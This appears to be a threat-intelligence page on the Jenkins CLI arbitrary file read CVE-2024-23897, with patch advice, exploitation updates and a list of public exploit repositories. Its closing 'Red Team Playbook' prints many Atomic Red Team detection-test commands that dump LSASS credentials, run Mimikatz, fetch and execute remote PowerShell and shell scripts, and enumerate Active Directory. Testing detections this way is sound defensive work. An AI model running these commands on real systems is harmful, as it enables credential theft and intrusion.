CVE-2024-23897
Overview
This vulnerability is an arbitrary file read flaw rooted in the Jenkins CLI command parser. The parser incorrectly processes arguments containing an '@' character followed by a file path by replacing this pattern with the contents of the referenced file. This behavior occurs because the feature intended for local file content injection is not disabled by default, affecting Jenkins controller components handling CLI commands.
Vulnerability Description
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system.
Impact
An unauthenticated attacker can exploit this vulnerability to read arbitrary files on the Jenkins controller's file system, potentially exposing sensitive configuration files, credentials, or other critical data. No authentication or user interaction is required to trigger the flaw, enabling remote information disclosure. This exposure can facilitate further attacks such as credential theft, privilege escalation, or lateral movement within the affected environment, leading to significant data breaches and operational compromise.
Solution
Apply the official Jenkins security update as detailed in the vendor advisory SECURITY-3314 available at https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314. Specifically, upgrade Jenkins to version 2.442 or later, or LTS 2.426.3 or later, where the CLI command parser's '@' file path replacement feature is properly disabled by default. Follow the advisory instructions for patching and verifying the fix in your deployment environment.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in Jenkins arises from a flaw in its command-line interface (CLI) command parser, which fails to adequately restrict the use of the '@' character in command arguments. This character, when followed by a file path, triggers the parser to replace it with the contents of the specified file. As a result, this unintended behavior allows unauthenticated attackers to read arbitrary files from the Jenkins controller's file system. The severity of this issue is underscored by its high CVSS score of 9.8, indicating a critical risk that can be exploited without requiring any form of authentication or privileged access.
Exploitation of this vulnerability can occur through various attack vectors, primarily involving the CLI interface of Jenkins. An attacker could craft a malicious command that includes the '@' character followed by a path to sensitive files, such as configuration files, credentials, or other critical data stored on the Jenkins server. By executing this command, the attacker could retrieve sensitive information that could lead to further attacks, such as privilege escalation, data exfiltration, or lateral movement within the network. The simplicity of this attack, combined with the lack of authentication requirements, makes it particularly dangerous, as it can be executed by anyone with network access to the Jenkins instance.
The real-world impact of this vulnerability is significant, especially for organizations that rely on Jenkins for continuous integration and continuous delivery (CI/CD) processes. The exposure of sensitive files can lead to severe business risks, including data breaches, loss of intellectual property, and compromise of user credentials. Additionally, the potential for attackers to gain unauthorized access to the Jenkins environment could result in the manipulation of build processes, deployment of malicious code, or disruption of services. The financial implications of such breaches can be substantial, encompassing regulatory fines, reputational damage, and remediation costs.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-layered security strategy. First and foremost, it is crucial to upgrade to the latest version of Jenkins, where this vulnerability has been addressed. Regular patch management and updates are essential in maintaining the security posture of any software environment. Additionally, organizations should consider implementing network segmentation to restrict access to the Jenkins server, ensuring that only authorized personnel can interact with the CLI. Monitoring and logging access to the Jenkins environment can also help identify suspicious activities and potential exploitation attempts.
In conclusion, the vulnerability in Jenkins presents a critical risk due to its ability to allow unauthenticated attackers to access sensitive files on the server. The ease of exploitation and the potential for significant business impact necessitate immediate attention from organizations utilizing Jenkins. By prioritizing timely updates, access controls, and monitoring, organizations can mitigate the risks associated with this vulnerability and safeguard their CI/CD processes against potential threats.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-23897, accompanied by the emergence of new proof-of-concept tools that enhance attacker capabilities. This development broadens the exploit landscape, lowering the technical barriers for threat actors to leverage the vulnerability. Notably, ransomware groups have been linked to active exploitation campaigns, underscoring the increased operationalization of this flaw in the wild. While the EPSS score remains high and stable, the qualitative rise in observed activity signals a heightened risk environment. For defenders, this means that detection and response efforts must adapt to a more aggressive threat posture, as adversaries are rapidly incorporating these tools into their attack workflows. Consequently, the threat level associated with this vulnerability has intensified, reflecting its growing attractiveness for both opportunistic and targeted attacks.
Update 2 — May 23, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-23897, with our telemetry indicating a significant uptick in adversary engagement. This surge coincides with the emergence of multiple new proof-of-concept exploits and scanning tools publicly available on prominent code repositories, facilitating easier weaponization by threat actors. Notably, ransomware groups have been observed integrating this vulnerability into their attack chains, amplifying its operational impact. Although the EPSS score remains near its peak, the qualitative increase in exploitation activity signals a shift toward more aggressive and widespread abuse. For defenders, this evolving landscape underscores an elevated threat level, as attackers are rapidly refining their capabilities to leverage this critical Jenkins flaw for unauthorized file access and potential remote code execution, increasing the risk of severe system compromise.
Update 3 — June 07, 2026
CSURFACE threat intelligence has detected a modest increase in exploitation attempts targeting CVE-2024-23897, reflected by a slight rise in telemetry activity. While the EPSS score remains effectively unchanged, this subtle uptick signals continued attacker interest and persistent reconnaissance efforts. Notably, the availability of multiple new proof-of-concept exploits and scanning tools on public repositories has likely lowered the barrier for threat actors to weaponize this vulnerability. This development sustains the risk of unauthorized file disclosure on vulnerable Jenkins controllers, particularly as ransomware groups continue to incorporate this flaw into their attack chains. For defenders, the incremental rise in exploitation activity underscores the necessity for heightened vigilance despite stable risk metrics, as adversaries refine their tactics to exploit this critical Jenkins vulnerability with greater efficiency and scale.
Update 4 — July 05, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-23897, reflecting a growing operational tempo among threat actors. This surge correlates with the continued proliferation of publicly available proof-of-concept exploits, which have lowered the technical barrier for adversaries to weaponize the vulnerability. Notably, ransomware groups are increasingly observed integrating this flaw into their attack chains, amplifying the potential impact beyond unauthorized file disclosure to include broader system compromise and extortion scenarios. Although the EPSS score remains at an extreme level, the sharp rise in detection activity signals an intensifying threat environment that demands sustained attention. For defenders, this development underscores the urgency of monitoring for exploitation indicators and reinforces the criticality of timely patching and mitigation efforts to counteract the expanding exploitation landscape.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Jenkins | Jenkins | All |
cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:*
|
|
|
Jenkins | Jenkins | All |
cpe:2.3:a:jenkins:jenkins:*:*:*:*:-:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Jenkins cli Ampersand Replacement Arbitrary File Read
auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read
|
h00die, Yaniv Nizry, binganao +2 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Jenkins 2.441 - Local File Inclusion | Matisse Beckandt | webapps | java | - | View |
GitHub PoCs (46)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
h4x0r-dz/CVE-2024-23897
CVE-2024-23897
|
h4x0r-dz | 205 | 35 | 2024-01-26 | View |
|
binganao/CVE-2024-23897
|
binganao | 99 | 9 | 2024-01-26 | View |
|
xaitax/CVE-2024-23897
CVE-2024-23897 | Jenkins <= 2.441 & <= LTS 2.426.2 PoC and scanner.
|
xaitax | 80 | 27 | 2024-01-26 | View |
|
wjlin0/CVE-2024-23897
CVE-2024-23897 - Jenkins 任意文件读取 利用工具
|
wjlin0 | 86 | 10 | 2024-01-27 | View |
|
godylockz/CVE-2024-23897
POC for CVE-2024-23897 Jenkins File-Read
|
godylockz | 43 | 5 | 2024-02-16 | View |
|
kaanatmacaa/CVE-2024-23897
Nuclei template for CVE-2024-23897 (Jenkins LFI Vulnerability)
|
kaanatmacaa | 22 | 6 | 2024-02-04 | View |
|
Vozec/CVE-2024-23897
This repository presents a proof-of-concept of CVE-2024-23897
|
Vozec | 17 | 3 | 2024-01-28 | View |
|
P4x1s/CVE-2024-23897
CVE-2024-23897 jenkins-cli
|
P4x1s | 15 | 2 | 2024-01-27 | View |
|
Maalfer/CVE-2024-23897
Poc para explotar la vulnerabilidad CVE-2024-23897 en versiones 2.441 y anteriores de Jenkins, mediante la cual podremos...
|
Maalfer | 13 | 4 | 2024-05-16 | View |
|
verylazytech/CVE-2024-23897
POC - Jenkins File Read Vulnerability - CVE-2024-23897
|
verylazytech | 10 | 7 | 2024-09-30 | View |
|
jenkinsci-cert/SECURITY-3314-3315
Workaround for disabling the CLI to mitigate SECURITY-3314/CVE-2024-23897 and SECURITY-3315/CVE-2024-23898
|
jenkinsci-cert | 7 | 2 | 2024-01-23 | View |
|
10T4/PoC-Fix-jenkins-rce_CVE-2024-23897
on this git you can find all information on the CVE-2024-23897
|
10T4 | 4 | 2 | 2024-01-27 | View |
|
yoryio/CVE-2024-23897
Scanner for CVE-2024-23897 - Jenkins
|
yoryio | 5 | 0 | 2024-01-27 | View |
|
viszsec/CVE-2024-23897
Jenkins POC of Arbitrary file read vulnerability through the CLI can lead to RCE
|
viszsec | 5 | 0 | 2024-01-29 | View |
|
ThatNotEasy/CVE-2024-23897
Perform with massive Jenkins Reading-2-RCE
|
ThatNotEasy | 3 | 1 | 2024-02-19 | View |
|
D1se0/CVE-2024-23897-Vulnerabilidad-Jenkins
|
D1se0 | 4 | 0 | 2024-12-08 | View |
|
Praison001/CVE-2024-23897-Jenkins-Arbitrary-Read-File-Vulnerability
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an...
|
Praison001 | 3 | 1 | 2024-02-07 | View |
|
Ap0dexMe0/CVE-2024-23897
Perform with massive Jenkins Reading-2-RCE
|
Ap0dexMe0 | 2 | 1 | 2024-02-19 | View |
|
Fineken/Jenkins-CVE-2024-23897-Lab
|
Fineken | 2 | 0 | 2025-07-24 | View |
|
murataydemir/CVE-2024-23897
[CVE-2024-23897] Jenkins CI Authenticated Arbitrary File Read Through the CLI Leads to Remote Code Execution (RCE)
|
murataydemir | 0 | 2 | 2024-05-07 | View |
|
AbraXa5/Jenkins-CVE-2024-23897
PoC for Jenkins CVE-2024-23897
|
AbraXa5 | 1 | 1 | 2024-02-01 | View |
|
wvverez/CVE-2024-23897
「🤵🏻」PoC for CVE-2024-23897 Jenkins Reading internal system files.
|
wvverez | 2 | 0 | 2026-01-18 | View |
|
vmtyan/poc-cve-2024-23897
|
vmtyan | 2 | 0 | 2024-01-26 | View |
|
Nebian/CVE-2024-23897
Scraping tool to ennumerate directories or files with the CVE-2024-23897 vulnerability in Jenkins.
|
Nebian | 1 | 0 | 2024-02-21 | View |
|
jopraveen/CVE-2024-23897
|
jopraveen | 1 | 0 | 2024-01-29 | View |
|
JAthulya/CVE-2024-23897
Jenkins CVE-2024-23897: Arbitrary File Read Vulnerability
|
JAthulya | 1 | 0 | 2024-05-03 | View |
|
Marouane133/jenkins-lfi
Jenkins CVE-2024-23897 POC : Arbitrary File Read Vulnerability Leading to RCE
|
Marouane133 | 1 | 0 | 2025-01-02 | View |
|
rivaedoardo62-boop/cve-2024-23897-jenkins-poc
Self-contained Docker reproduction and analysis of CVE-2024-23897, the Jenkins CLI arbitrary file read via the args4j @-...
|
rivaedoardo62-boop | 0 | 0 | 2026-06-16 | View |
|
w41l3r/jenkins_scan
Find jenkins environment and checks for CVE-2024-23897
|
w41l3r | 0 | 0 | 2026-04-23 | View |
|
classic130/CVE-2024-23897-Jenkins-4.441
|
classic130 | 0 | 0 | 2025-07-29 | View |
|
ifconfig-me/CVE-2024-23897
Jenkins Arbitrary File Leak Vulnerability [CVE-2024-23897]
|
ifconfig-me | 0 | 0 | 2024-02-16 | View |
|
amalpvatayam67/day03-jenkins-23897
Jenkins CLI arbitrary file read (CVE-2024-23897)
|
amalpvatayam67 | 0 | 0 | 2025-09-10 | View |
|
hybinn/CVE-2024-23897
|
hybinn | 0 | 0 | 2025-10-06 | View |
|
harekrishnarai/CVE-2024-23897-test-windows
|
harekrishnarai | 0 | 0 | 2025-11-11 | View |
|
pulentoski/CVE-2024-23897-Arbitrary-file-read
Un script realizado en python para atumatizar la vulnerabilidad CVE-2024-23897
|
pulentoski | 0 | 0 | 2024-02-20 | View |
|
tvasari/CVE-2024-23897
Jenkins CLI arbitrary read (CVE-2024-23897 applies to versions below 2.442 and LTS 2.426.3)
|
tvasari | 0 | 0 | 2025-04-04 | View |
|
cc3305/CVE-2024-23897
CVE-2024-23897 exploit script
|
cc3305 | 0 | 0 | 2024-07-28 | View |
|
ShieldAuth-PHP/PBL05-CVE-Analsys
CVE-2024-23897 분석
|
ShieldAuth-PHP | 0 | 0 | 2024-09-09 | View |
|
slytechroot/CVE-2024-23897
Jenkins RCE Arbitrary File Read CVE-2024-23897
|
slytechroot | 0 | 0 | 2025-03-23 | View |
|
brandonhjh/Jenkins-CVE-2024-23897-Exploit-Demo
|
brandonhjh | 0 | 0 | 2025-03-28 | View |
|
vmc8ll/poc-CVE-2024-23897
CVE-2024-23897: Jenkins Arbitrary File Read Lead to RCE
|
vmc8ll | 0 | 0 | 2026-03-03 | View |
|
B4CK4TT4CK/CVE-2024-23897
CVE-2024-23897
|
B4CK4TT4CK | 0 | 0 | 2024-02-13 | View |
|
Surko888/Surko-Exploit-Jenkins-CVE-2024-23897
Un exploit con el que puedes aprovecharte de la vulnerabilidad (CVE-2024-23897)
|
Surko888 | 0 | 0 | 2024-05-26 | View |
|
WLXQqwer/Jenkins-CVE-2024-23897-
|
WLXQqwer | 0 | 0 | 2024-02-04 | View |
|
aadi0258/Exploit-CVE-2024-23897
|
aadi0258 | 0 | 0 | 2025-10-26 | View |
|
r0xDB/CVE-2024-23897
Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser that replaces an...
|
r0xDB | 0 | 0 | 2024-01-28 | View |
Threat Feed
29 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
